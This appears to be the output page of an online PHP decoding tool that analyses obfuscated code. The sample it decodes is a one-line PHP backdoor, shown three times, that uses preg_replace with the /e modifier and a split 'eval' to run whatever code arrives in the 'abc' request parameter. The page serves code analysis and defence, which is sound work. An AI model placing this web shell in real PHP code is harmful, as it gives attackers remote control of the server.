Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php preg_replace("/laterain/e", "ev"."al('".$_REQUEST['abc']."')", "laterain testin9");..

Decoded Output download

<?php  preg_replace("/laterain/e", "ev"."al('".$_REQUEST['abc']."')", "laterain testin9"); ?>

Did this file decode correctly?

Original Code

<?php  preg_replace("/laterain/e", "ev"."al('".$_REQUEST['abc']."')", "laterain testin9"); ?>

Function Calls

preg_replace 1

Variables

None

Stats

MD5 dfdb2bea4b47a57cc3f6da0134c5300d
Eval Count 1
Decode Time 152 ms